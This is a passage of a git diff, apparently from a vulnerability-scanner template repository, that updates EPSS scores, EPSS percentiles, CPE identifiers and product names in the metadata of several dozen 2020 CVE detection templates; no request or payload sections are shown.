cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.98014
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml
index aeefddef1b..c23fd0d07e 100644
--- a/http/cves/2020/CVE-2020-3187.yaml
+++ b/http/cves/2020/CVE-2020-3187.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2020-3187
cwe-id: CWE-22
- epss-score: 0.97406
+ epss-score: 0.97377
cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9986
metadata:
max-request: 1
vendor: cisco
diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml
index 3621417844..1634e08d72 100644
--- a/http/cves/2020/CVE-2020-3452.yaml
+++ b/http/cves/2020/CVE-2020-3452.yaml
@@ -19,12 +19,13 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-3452
cwe-id: CWE-22,CWE-20
- epss-score: 0.97544
- cpe: cpe:2.3:a:cisco:adaptive_security_appliance:*:*:*:*:*:*:*:*
+ epss-score: 0.97534
+ cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99987
metadata:
max-request: 2
vendor: cisco
- product: adaptive_security_appliance
+ product: adaptive_security_appliance_software
tags: lfi,kev,packetstorm,cve,cve2020,cisco
http:
diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml
index 38c4a3d045..e054f358e9 100644
--- a/http/cves/2020/CVE-2020-35234.yaml
+++ b/http/cves/2020/CVE-2020-35234.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-35234
cwe-id: CWE-532
- epss-score: 0.4891
+ epss-score: 0.39621
cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9676
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml
index af43bed792..6bd4a93948 100644
--- a/http/cves/2020/CVE-2020-35338.yaml
+++ b/http/cves/2020/CVE-2020-35338.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-35338
cwe-id: CWE-798
- epss-score: 0.04387
+ epss-score: 0.05169
cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.91985
metadata:
max-request: 1
vendor: mobileviewpoint
diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml
index bb733a54c5..52c18e76f6 100644
--- a/http/cves/2020/CVE-2020-35476.yaml
+++ b/http/cves/2020/CVE-2020-35476.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-35476
cwe-id: CWE-78
- epss-score: 0.96298
+ epss-score: 0.96323
cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99341
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml
index 9787df6907..31e6f053b5 100644
--- a/http/cves/2020/CVE-2020-35489.yaml
+++ b/http/cves/2020/CVE-2020-35489.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 10
cve-id: CVE-2020-35489
cwe-id: CWE-434
- epss-score: 0.92295
+ epss-score: 0.92577
cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.98617
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml
index e3c96601b3..93e0c5f41b 100644
--- a/http/cves/2020/CVE-2020-35580.yaml
+++ b/http/cves/2020/CVE-2020-35580.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-35580
cwe-id: CWE-22
- epss-score: 0.02161
+ epss-score: 0.02411
cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88535
metadata:
max-request: 1
vendor: searchblox
diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml
index c9c15d6297..d98803ec80 100644
--- a/http/cves/2020/CVE-2020-35598.yaml
+++ b/http/cves/2020/CVE-2020-35598.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-35598
cwe-id: CWE-22
- epss-score: 0.10696
+ epss-score: 0.10794
cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94342
metadata:
max-request: 1
vendor: advanced_comment_system_project
diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml
index 2483d1dee1..2fe3c7af2e 100644
--- a/http/cves/2020/CVE-2020-35713.yaml
+++ b/http/cves/2020/CVE-2020-35713.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-35713
cwe-id: CWE-78
- epss-score: 0.97277
+ epss-score: 0.9717
cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99711
metadata:
max-request: 1
vendor: linksys
diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml
index 635b914129..3f653c57d0 100644
--- a/http/cves/2020/CVE-2020-35729.yaml
+++ b/http/cves/2020/CVE-2020-35729.yaml
@@ -15,14 +15,14 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-35729
cwe-id: CWE-78
- epss-score: 0.94817
+ epss-score: 0.95277
cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:*
+ epss-percentile: 0.99064
metadata:
max-request: 1
vendor: klogserver
product: klog_server
tags: cve,cve2020,klog,rce
-
variables:
dummy: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml
index 23348da812..f74e9d1fad 100644
--- a/http/cves/2020/CVE-2020-35736.yaml
+++ b/http/cves/2020/CVE-2020-35736.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-35736
cwe-id: CWE-22
- epss-score: 0.01553
+ epss-score: 0.01465
cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:*
+ epss-percentile: 0.85077
metadata:
max-request: 1
vendor: liftoffsoftware
diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml
index e454ddacc3..376b9e8256 100644
--- a/http/cves/2020/CVE-2020-35749.yaml
+++ b/http/cves/2020/CVE-2020-35749.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01796
cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.86587
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml
index 9eecc11d60..3b57f68cda 100644
--- a/http/cves/2020/CVE-2020-35774.yaml
+++ b/http/cves/2020/CVE-2020-35774.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.97219
cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99744
metadata:
max-request: 1
vendor: twitter
diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml
index 4291dafffa..8d7dffb416 100644
--- a/http/cves/2020/CVE-2020-3580.yaml
+++ b/http/cves/2020/CVE-2020-3580.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.97233
cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99751
metadata:
max-request: 1
vendor: cisco
diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml
index a728d77cef..5e15ce291f 100644
--- a/http/cves/2020/CVE-2020-35846.yaml
+++ b/http/cves/2020/CVE-2020-35846.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-35846
cwe-id: CWE-89
- epss-score: 0.84079
+ epss-score: 0.80821
cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97904
metadata:
max-request: 1
vendor: agentejo
diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml
index b0282c3e01..597474129b 100644
--- a/http/cves/2020/CVE-2020-35847.yaml
+++ b/http/cves/2020/CVE-2020-35847.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-35847
cwe-id: CWE-89
- epss-score: 0.78648
+ epss-score: 0.76547
cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97778
metadata:
max-request: 2
shodan-query: http.favicon.hash:688609340
diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml
index 09503cef4d..fc5328ab07 100644
--- a/http/cves/2020/CVE-2020-35848.yaml
+++ b/http/cves/2020/CVE-2020-35848.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-35848
cwe-id: CWE-89
- epss-score: 0.80376
+ epss-score: 0.75494
cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97747
metadata:
max-request: 1
vendor: agentejo
diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml
index 870b298806..8c713b94b4 100644
--- a/http/cves/2020/CVE-2020-35951.yaml
+++ b/http/cves/2020/CVE-2020-35951.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.9
cve-id: CVE-2020-35951
cwe-id: CWE-306
- epss-score: 0.00189
+ epss-score: 0.00158
cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.51651
metadata:
max-request: 4
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml
index cd4c846922..ed15f82fd5 100644
--- a/http/cves/2020/CVE-2020-35984.yaml
+++ b/http/cves/2020/CVE-2020-35984.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00127
cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*
+ epss-percentile: 0.46587
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml
index ac018b6657..8a9eb0612e 100644
--- a/http/cves/2020/CVE-2020-35985.yaml
+++ b/http/cves/2020/CVE-2020-35985.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00127
cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*
+ epss-percentile: 0.46587
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml
index ca4c5cacca..261de4127a 100644
--- a/http/cves/2020/CVE-2020-35986.yaml
+++ b/http/cves/2020/CVE-2020-35986.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00127
cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*
+ epss-percentile: 0.46587
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml
index 20c0dc9894..5385f7ee19 100644
--- a/http/cves/2020/CVE-2020-35987.yaml
+++ b/http/cves/2020/CVE-2020-35987.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00127
cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*
+ epss-percentile: 0.46587
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml
index 1752df2d3a..5c3d98166f 100644
--- a/http/cves/2020/CVE-2020-36112.yaml
+++ b/http/cves/2020/CVE-2020-36112.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-36112
cwe-id: CWE-89
- epss-score: 0.47622
+ epss-score: 0.48049
cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.97007
metadata:
max-request: 1
vendor: cse_bookstore_project
diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml
index a585d37ff6..f36541a93a 100644
--- a/http/cves/2020/CVE-2020-36289.yaml
+++ b/http/cves/2020/CVE-2020-36289.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-36289
cwe-id: CWE-863
- epss-score: 0.97254
+ epss-score: 0.97071
cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99658
metadata:
max-request: 2
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml
index a8f6b49430..7d057bacc4 100644
--- a/http/cves/2020/CVE-2020-36365.yaml
+++ b/http/cves/2020/CVE-2020-36365.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00331
cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:*
+ epss-percentile: 0.67387
metadata:
max-request: 1
shodan-query: http.html:'content="Smartstore'
diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml
index ffc6e90988..e12616fe10 100644
--- a/http/cves/2020/CVE-2020-36510.yaml
+++ b/http/cves/2020/CVE-2020-36510.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-36510
cwe-id: CWE-79
- epss-score: 0.00119
+ epss-score: 0.00141
cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49173
metadata:
max-request: 1
verified: "false"
diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml
index 9dddbca03c..f40c2e74b0 100644
--- a/http/cves/2020/CVE-2020-4463.yaml
+++ b/http/cves/2020/CVE-2020-4463.yaml
@@ -20,8 +20,9 @@ info:
cvss-score: 8.2
cve-id: CVE-2020-4463
cwe-id: CWE-611
- epss-score: 0.40093
+ epss-score: 0.36503
cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.96633
metadata:
max-request: 2
shodan-query: http.favicon.hash:-399298961
diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml
index be7dcf8393..b84b06255a 100644
--- a/http/cves/2020/CVE-2020-5191.yaml
+++ b/http/cves/2020/CVE-2020-5191.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00383
cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:*
+ epss-percentile: 0.69634
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml
index ea58fdeb3d..81575e071f 100644
--- a/http/cves/2020/CVE-2020-5192.yaml
+++ b/http/cves/2020/CVE-2020-5192.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-5192
cwe-id: CWE-89
- epss-score: 0.01145
+ epss-score: 0.02275
cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:*
+ epss-percentile: 0.88219
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml
index 2009e4c55f..d334a2a970 100644
--- a/http/cves/2020/CVE-2020-5284.yaml
+++ b/http/cves/2020/CVE-2020-5284.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2020-5284
cwe-id: CWE-22,CWE-23
- epss-score: 0.00104
+ epss-score: 0.00152
cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*
+ epss-percentile: 0.50785
metadata:
max-request: 1
vendor: zeit
diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml
index e144e45f6a..75f3890923 100644
--- a/http/cves/2020/CVE-2020-5307.yaml
+++ b/http/cves/2020/CVE-2020-5307.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.01326
cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.84331
metadata:
max-request: 1
vendor: phpgurukul_dairy_farm_shop_management_system_project
diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml
index f8740c8425..e1c35ed2d5 100644
--- a/http/cves/2020/CVE-2020-5405.yaml
+++ b/http/cves/2020/CVE-2020-5405.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-22,CWE-23
epss-score: 0.00258
cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
+ epss-percentile: 0.6281
metadata:
max-request: 1
vendor: vmware
diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml
index b5485609cd..d213561407 100644
--- a/http/cves/2020/CVE-2020-5410.yaml
+++ b/http/cves/2020/CVE-2020-5410.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-5410
cwe-id: CWE-22,CWE-23
- epss-score: 0.97314
+ epss-score: 0.9725
cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99762
metadata:
max-request: 1
vendor: vmware
diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml
index 3d935f48a9..482fae983c 100644
--- a/http/cves/2020/CVE-2020-5412.yaml
+++ b/http/cves/2020/CVE-2020-5412.yaml
@@ -12,9 +12,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2020-5412
- cwe-id: CWE-441,CWE-610
- epss-score: 0.04459
+ cwe-id: CWE-610,CWE-441
+ epss-score: 0.04418
cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:*
+ epss-percentile: 0.91325
metadata:
max-request: 1
vendor: vmware
diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml
index 40e60befbf..375502e5a7 100644
--- a/http/cves/2020/CVE-2020-5775.yaml
+++ b/http/cves/2020/CVE-2020-5775.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 5.8
cve-id: CVE-2020-5775
cwe-id: CWE-918
- epss-score: 0.00189
+ epss-score: 0.00194
cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:*
+ epss-percentile: 0.56373
metadata:
max-request: 1
vendor: instructure
diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml
index 9adacd41fb..59fcded45a 100644
--- a/http/cves/2020/CVE-2020-5776.yaml
+++ b/http/cves/2020/CVE-2020-5776.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-5776
cwe-id: CWE-352
- epss-score: 0.52762
+ epss-score: 0.53597
cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97163
metadata:
max-request: 3
shodan-query: http.component:"Magento"
diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml
index 64401c02cf..6d1080c38a 100644
--- a/http/cves/2020/CVE-2020-5777.yaml
+++ b/http/cves/2020/CVE-2020-5777.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-5777
cwe-id: CWE-287
- epss-score: 0.02505
+ epss-score: 0.02378
cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88457
metadata:
max-request: 1
shodan-query: http.component:"Magento"
diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml
index 4c5484e9c1..b69e676937 100644
--- a/http/cves/2020/CVE-2020-5847.yaml
+++ b/http/cves/2020/CVE-2020-5847.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-5847
cwe-id: CWE-94,CWE-668
- epss-score: 0.97138
+ epss-score: 0.97113
cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99678
metadata:
max-request: 1
vendor: unraid
diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml
index 40d633ad19..8efac8bf5c 100644
--- a/http/cves/2020/CVE-2020-5902.yaml
+++ b/http/cves/2020/CVE-2020-5902.yaml
@@ -25,6 +25,7 @@ info:
cwe-id: CWE-22
epss-score: 0.97566
cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99997
metadata:
max-request: 8
vendor: f5
diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml
index 80422868f3..2d16470a9f 100644
--- a/http/cves/2020/CVE-2020-6171.yaml
+++ b/http/cves/2020/CVE-2020-6171.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.47998
metadata:
max-request: 1
vendor: communilink
diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml
index ec8b9bd9b9..6f6f2e1060 100644
--- a/http/cves/2020/CVE-2020-6207.yaml
+++ b/http/cves/2020/CVE-2020-6207.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-306
epss-score: 0.97442
cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:*
+ epss-percentile: 0.99915
metadata:
max-request: 1
vendor: sap
diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml
index e7bfabaf49..b956a590ce 100644
--- a/http/cves/2020/CVE-2020-6287.yaml
+++ b/http/cves/2020/CVE-2020-6287.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-306
epss-score: 0.97519
cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*
+ epss-percentile: 0.99976
metadata:
max-request: 1
shodan-query: http.favicon.hash:-266008933
diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml
index db1121709f..3b6cc52b29 100644
--- a/http/cves/2020/CVE-2020-6308.yaml
+++ b/http/cves/2020/CVE-2020-6308.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-918
epss-score: 0.00306
cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:*
+ epss-percentile: 0.66005
metadata:
max-request: 1
vendor: sap
diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml
index 76bac71852..66cc36f259 100644
--- a/http/cves/2020/CVE-2020-6637.yaml
+++ b/http/cves/2020/CVE-2020-6637.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-6637
cwe-id: CWE-89
- epss-score: 0.01772
+ epss-score: 0.02003
cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:*
+ epss-percentile: 0.87406
metadata:
max-request: 3
shodan-query: http.title:"openSIS"
diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml
index 4b3c649122..db6a508523 100644
--- a/http/cves/2020/CVE-2020-7107.yaml
+++ b/http/cves/2020/CVE-2020-7107.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00517
cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.73771
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml
index 6ba9dd0441..4bc9b9959b 100644
--- a/http/cves/2020/CVE-2020-7136.yaml
+++ b/http/cves/2020/CVE-2020-7136.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-7136
cwe-id: CWE-288
- epss-score: 0.05173
+ epss-score: 0.16449
cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95315
metadata:
max-request: 2
vendor: hpe
diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml
index ffe2093953..d687a8b27d 100644
--- a/http/cves/2020/CVE-2020-7209.yaml
+++ b/http/cves/2020/CVE-2020-7209.yaml
@@ -17,8 +17,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-7209
- epss-score: 0.97134
+ epss-score: 0.97202
cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99729
metadata:
max-request: 1
vendor: hp
diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml
index caf9611350..f850693cbd 100644
--- a/http/cves/2020/CVE-2020-7318.yaml
+++ b/http/cves/2020/CVE-2020-7318.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00051
cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:*
+ epss-percentile: 0.17698
metadata:
max-request: 1
vendor: mcafee
diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml
index a6e7b26f7f..e527f1a365 100644
--- a/http/cves/2020/CVE-2020-7796.yaml
+++ b/http/cves/2020/CVE-2020-7796.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-7796
cwe-id: CWE-918
- epss-score: 0.74825
+ epss-score: 0.72496
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97646
metadata:
max-request: 1
vendor: synacor
diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml
index 08e90624ea..ee86c9457d 100644
--- a/http/cves/2020/CVE-2020-7943.yaml
+++ b/http/cves/2020/CVE-2020-7943.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-7943
cwe-id: CWE-276
- epss-score: 0.05993
+ epss-score: 0.08018
cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:*
+ epss-percentile: 0.93448
metadata:
max-request: 1
vendor: puppet
diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml
index 88b5139d38..b7f1784b08 100644
--- a/http/cves/2020/CVE-2020-7961.yaml
+++ b/http/cves/2020/CVE-2020-7961.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-7961
cwe-id: CWE-502
- epss-score: 0.97475
+ epss-score: 0.97467
cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:*
+ epss-percentile: 0.99937
metadata:
max-request: 2
vendor: liferay
diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml
index 9fe5b2640c..3f709a6116 100644
--- a/http/cves/2020/CVE-2020-7980.yaml
+++ b/http/cves/2020/CVE-2020-7980.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-7980
cwe-id: CWE-78
- epss-score: 0.97201
+ epss-score: 0.96908
cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:*
+ epss-percentile: 0.99589
metadata:
max-request: 1
shodan-query: http.title:"Intellian Aptus Web"
diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml
index fdc4a90771..ece29df375 100644
--- a/http/cves/2020/CVE-2020-8115.yaml
+++ b/http/cves/2020/CVE-2020-8115.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0187
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86916
metadata:
max-request: 1
vendor: revive-adserver
diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml
